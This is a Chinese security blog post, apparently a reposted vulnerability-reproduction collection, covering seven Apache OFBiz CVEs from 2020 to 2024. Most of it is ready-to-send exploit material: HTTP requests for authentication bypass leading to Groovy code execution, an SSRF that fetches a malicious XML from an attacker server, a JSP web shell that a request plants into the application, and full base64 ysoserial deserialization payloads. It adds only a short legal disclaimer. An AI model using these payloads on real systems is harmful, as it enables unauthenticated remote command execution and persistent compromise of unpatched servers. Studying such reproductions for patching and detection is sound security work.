Apache OFBiz历史漏洞复现合集.pdf

admin 2024年10月31日10:15:58评论10 views字数 15592阅读51分58秒阅读模式

关注我们 ❤️,添加星标 🌟,一起学安全!
作者:Timeline Sec漏洞研究组
本文字数:14966
阅读时长:5 ~ 7mins
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负

序号 漏洞编号 漏洞类型 作者
1 CVE-2024-45507 SSRF&RCE 七安
2 CVE-2024-45195 RCE 七安
3 CVE-2024-38856 RCE 七安
4 CVE-2024-32113 RCE 七安
5 CVE-2024-36104 RCE 七安
6 CVE-2023-51467 反序列化 七安
7 CVE-2020-9496 反序列化 七安

注:后台回复“技术手册”可获取合集PDF文档

Apache OFBiz历史漏洞复现合集.pdf

Apache OFBiz SSRF & RCE漏洞(CVE-2024-45507)

0x01 利用条件

权限要求:无需权限
其他条件:允许远程访问

0x02 影响版本

<= 18.12.16

0x03 漏洞复现

首先访问 https://ip:8443/accounting,等待页面加载。页面加载后可以看到登陆界面:

Apache OFBiz历史漏洞复现合集.pdf

由于是 SSRF 漏洞需要开启一个 http 服务器,使用 python 开启一个 http 服务

python3 -m http.server 8899 
SSRF 漏洞
Apache OFBiz历史漏洞复现合集.pdf
POST /webtools/control/forgotPassword/StatsSinceStart HTTP/1.1
Host: host
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

statsDecoratorLocation=http://vps:port/path

在 http 服务器成功看到请求

Apache OFBiz历史漏洞复现合集.pdf
执行代码

首先创建一个恶意 XML 文件,XML 文件内容如下:

<?xml version="1.0" encoding="UTF-8"?>
<screens xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns="http://ofbiz.apache.org/Widget-Screen" xsi:schemaLocation="http://ofbiz.apache.org/Widget-Screen http://ofbiz.apache.org/dtds/widget-screen.xsd">

    <screen name="StatsDecorator">
        <section>
            <actions>
                <set value="${groovy:'touch /tmp/success'.execute();}"/>
            </actions>
        </section>
    </screen>
</screens>

开启 http 服务,构造请求包:

Apache OFBiz历史漏洞复现合集.pdf

查看 OFbiz 服务器 /tmp 目录下是否存在 success 文件,文件存在则成功执行命令。

Apache OFBiz历史漏洞复现合集.pdf

Apache OFBiz 身份验证绕过导致远程代码执行(CVE-2024-45195)

0x01 利用条件

权限要求:无需权限
其他条件:允许远程访问

0x02 影响版本

<= 18.12.16

0x03 漏洞复现

首先访问 https://ip:8443/accounting,等待页面加载。页面加载后可以看到登陆界面:

Apache OFBiz历史漏洞复现合集.pdf

接下在服务器上创建恶意的 XML 文件和 CSV 文件,XML 文件名为 rceschema.xml,内容如下:

<data-files xsi:noNamespaceSchemaLocation="http://ofbiz.apache.org/dtds/datafiles.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
    <data-file name="rce" separator-style="fixed-length" type-code="text" start-line="0" encoding-type="UTF-8">
        <record name="rceentry" limit="many">
            <field name="jsp" type="String" length="605" position="0"></field>
        </record>
    </data-file>
</data-files>

CSV 文件名为 rcereport.csv,内容如下:

<%@ page import='java.io.*' %><%@ page import='java.util.*' %><h1>Ahoy!</h1><br><% String getcmd = request.getParameter("cmd"); if (getcmd != null) { out.println("Command: " + getcmd + "<br>"); String cmd1 = "/bin/sh"; String cmd2 = "-c"; String cmd3 = getcmd; String[] cmd = new String[3]; cmd[0] = cmd1; cmd[1] = cmd2; cmd[2] = cmd3; Process p = Runtime.getRuntime().exec(cmd); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine();}} %>,

需要注意的是:CSV 文件中内容的长度需要和 XML 文件的 length 的值保持一致。创建完成后,开始 http 服务:

Apache OFBiz历史漏洞复现合集.pdf

构造请求:

Apache OFBiz历史漏洞复现合集.pdf
POST /webtools/control/forgotPassword/viewdatafile HTTP/1.1
Host: host
User-Agent: curl/7.81.0
Accept: */*
Content-Length: 249
Content-Type: application/x-www-form-urlencoded

DATAFILE_LOCATION=http://vps:8899/rcereport.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://vps:8899/rceschema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce

检查http 服务器是否收到两个请求:

Apache OFBiz历史漏洞复现合集.pdf

收到两个两个请求后,访问 http://ip:8443/accounting/index.jsp?cmd=id 即可执行任意命令。

Apache OFBiz历史漏洞复现合集.pdf

Apache OFBiz 身份验证绕过导致远程代码执行 (CVE-2024-38856)

0x01 利用条件

权限要求:无需权限
其他条件:允许远程访问

0x02 影响版本

18.12.11

0x03 漏洞复现

首先访问 https://ip:8443/accounting,等待页面加载。页面加载后可以看到登陆界面:

构造请求:

Apache OFBiz历史漏洞复现合集.pdf
POST /webtools/control/main/ProgramExport HTTP/1.1
Host: host
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDbR7sY3IIwQX7kcJ
Content-Length: 188

------WebKitFormBoundaryDbR7sY3IIwQX7kcJ
Content-Disposition: form-data; name="groovyProgram"

throw new Exception('id'.u0065xecute().text);
------WebKitFormBoundaryDbR7sY3IIwQX7kcJ--

请求成功,在 Response 中就能看到执行结果。

Apache OFBiz 目录遍历导致命令执行(CVE-2024-32113)

0x01 利用条件

权限要求:无需权限
其他条件:允许远程访问

0x02 影响版本

< 18.12.13

0x03 漏洞复现

首先访问 https://ip:8443/accounting,等待页面加载。页面加载后可以看到登陆界面:

Apache OFBiz历史漏洞复现合集.pdf

构造如下请求:

Apache OFBiz历史漏洞复现合集.pdf
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35
Connection: close
Content-Length: 55
Content-Type: application/x-www-form-urlencoded
user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

groovyProgram=throw+new+Exception('id'.execute().text);

请求成功后即可在 Response 中查看命令执行的结果。

Apache OFBiz 目录遍历导致命令执行(CVE-2024-36104)

0x01 利用条件

权限要求:无需权限
其他条件:允许远程访问

0x02 影响版本

< 18.12.14

0x03 漏洞复现

首先访问 https://ip:8443/accounting,等待页面加载。页面加载后可以看到登陆界面:

Apache OFBiz历史漏洞复现合集.pdf

构造如下请求:

Apache OFBiz历史漏洞复现合集.pdf
POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35
Connection: close
Content-Length: 260
Content-Type: application/x-www-form-urlencoded
user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

groovyProgram=u0074u0068u0072u006fu0077u0020u006eu0065u0077u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu0028u0027u0069u0064u0027u002eu0065u0078u0065u0063u0075u0074u0065u0028u0029u002eu0074u0065u0078u0074u0029u003b

请求成功后即可在 Response 中查看命令执行的结果。

Apache OFBiz 鉴权绕过导致命令执行(CVE-2023-51467)

0x01 利用条件

权限要求:无需权限
其他条件:允许远程访问

0x02 影响版本

18.12.10

0x03 漏洞复现

首先访问 https://ip:8443/accounting,等待页面加载。页面加载后可以看到登陆界面:

Apache OFBiz历史漏洞复现合集.pdf

构造如下请求:

Apache OFBiz历史漏洞复现合集.pdf
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: host:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

请求成功后即可在 Response 中查看命令执行的结果。

Apache OfBiz 反序列化命令执行漏洞(CVE-2023-49070)

0x01 利用条件

权限要求:无需权限
其他条件:允许远程访问

0x02 影响版本

<=18.12.09

0x03 漏洞复现

首先访问 https://ip:8443/accounting,等待页面加载。页面加载后可以看到登陆界面:

Apache OFBiz历史漏洞复现合集.pdf

使用 ysoserial 的 CommonsBeanutils1 来生成Payload

java -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "n"
Apache OFBiz历史漏洞复现合集.pdf

使用生成的 Payload 构造如下请求:

Apache OFBiz历史漏洞复现合集.pdf
POST /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: host
Content-Type: application/xml
Content-Length: 4133

<?xml version="1.0"?>
<methodCall>
  <methodName>ProjectDiscovery</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAABqTK/rq+AAAAMgA5CgADACIHADcHACUHACYBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFrSCT85Hd7z4BAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAE1N0dWJUcmFuc2xldFBheWxvYWQBAAxJbm5lckNsYXNzZXMBADVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwAnAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHACgBADN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQAUamF2YS9pby9TZXJpYWxpemFibGUBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzAQAIPGNsaW5pdD4BABFqYXZhL2xhbmcvUnVudGltZQcAKgEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMACwALQoAKwAuAQASdG91Y2ggL3RtcC9zdWNjZXNzCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAceXNvc2VyaWFsL1B3bmVyNjY2MDUyMjEyMTU2MQEAHkx5c29zZXJpYWwvUHduZXI2NjYwNTIyMTIxNTYxOwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAC8ADgAAAAwAAQAAAAUADwA4AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAAAAEADwA4AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAADgADgAAACoABAAAAAEADwA4AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAEANgAAAAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACXVxAH4AEAAAAdTK/rq+AAAAMgAbCgADABUHABcHABgHABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAA8AA4AAAAMAAEAAAAFAA8AEgAAAAIAEwAAAAIAFAARAAAACgABAAIAFgAQAAlwdAAEUHducnB3AQB4cQB+AA14</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

随后登陆服务器查看 success 文件是否被创建

Apache OFBiz历史漏洞复现合集.pdf

Apache OfBiz 反序列化命令执行漏洞(CVE-2020-9496)

0x01 利用条件

权限要求:无需权限
其他条件:允许远程访问

0x02 影响版本

17.12.03

0x03 漏洞复现

首先访问 https://ip:8443/accounting,等待页面加载。页面加载后可以看到登陆界面:

Apache OFBiz历史漏洞复现合集.pdf

使用 ysoserial 的 CommonsBeanutils1 来生成Payload

java -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "n"

使用生成的 Payload 构造如下请求:

Apache OFBiz历史漏洞复现合集.pdf
POST /webtools/control/xmlrpc HTTP/1.1
Host: 192.168.0.163:8443
Content-Type: application/xml
Content-Length: 4133

<?xml version="1.0"?>
<methodCall>
  <methodName>ProjectDiscovery</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAABqTK/rq+AAAAMgA5CgADACIHADcHACUHACYBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFrSCT85Hd7z4BAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAE1N0dWJUcmFuc2xldFBheWxvYWQBAAxJbm5lckNsYXNzZXMBADVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwAnAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHACgBADN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQAUamF2YS9pby9TZXJpYWxpemFibGUBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzAQAIPGNsaW5pdD4BABFqYXZhL2xhbmcvUnVudGltZQcAKgEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMACwALQoAKwAuAQASdG91Y2ggL3RtcC9zdWNjZXNzCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAceXNvc2VyaWFsL1B3bmVyNjY2MDUyMjEyMTU2MQEAHkx5c29zZXJpYWwvUHduZXI2NjYwNTIyMTIxNTYxOwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAC8ADgAAAAwAAQAAAAUADwA4AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAAAAEADwA4AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAADgADgAAACoABAAAAAEADwA4AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAEANgAAAAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACXVxAH4AEAAAAdTK/rq+AAAAMgAbCgADABUHABcHABgHABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAA8AA4AAAAMAAEAAAAFAA8AEgAAAAIAEwAAAAIAFAARAAAACgABAAIAFgAQAAlwdAAEUHducnB3AQB4cQB+AA14</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

随后登陆服务器查看 success 文件是否被创建

Apache OFBiz历史漏洞复现合集.pdf

命令成功执行。

Apache OFBiz历史漏洞复现合集.pdf

回复【加群】进入微信交流群
回复【SRC群】进入SRC-QQ交流群
回复【新人】领取新人学习指南资料
回复【面试】获取渗透测试常见面试题

回复【手册】获取原创技术PDF手册

回复【合作】获取各类安全项目合作方式
回复【帮会】付费加入SRC知识库学习
回复培训】获取TimelineSec创办的实战课程

视频号:搜索TimelineSec

官方微博:#小程序://微博/tPbUYdN9EucSD4C

哔哩哔哩:https://space.bilibili.com/524591903

觉得有用就点个赞吧!
欢迎评论区留言讨论~
Apache OFBiz历史漏洞复现合集.pdf

原文始发于微信公众号(Timeline Sec):Apache OFBiz历史漏洞复现合集.pdf

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月31日10:15:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache OFBiz历史漏洞复现合集.pdfhttp://cn-sec.com/archives/3336548.html

发表评论

匿名网友 填写信息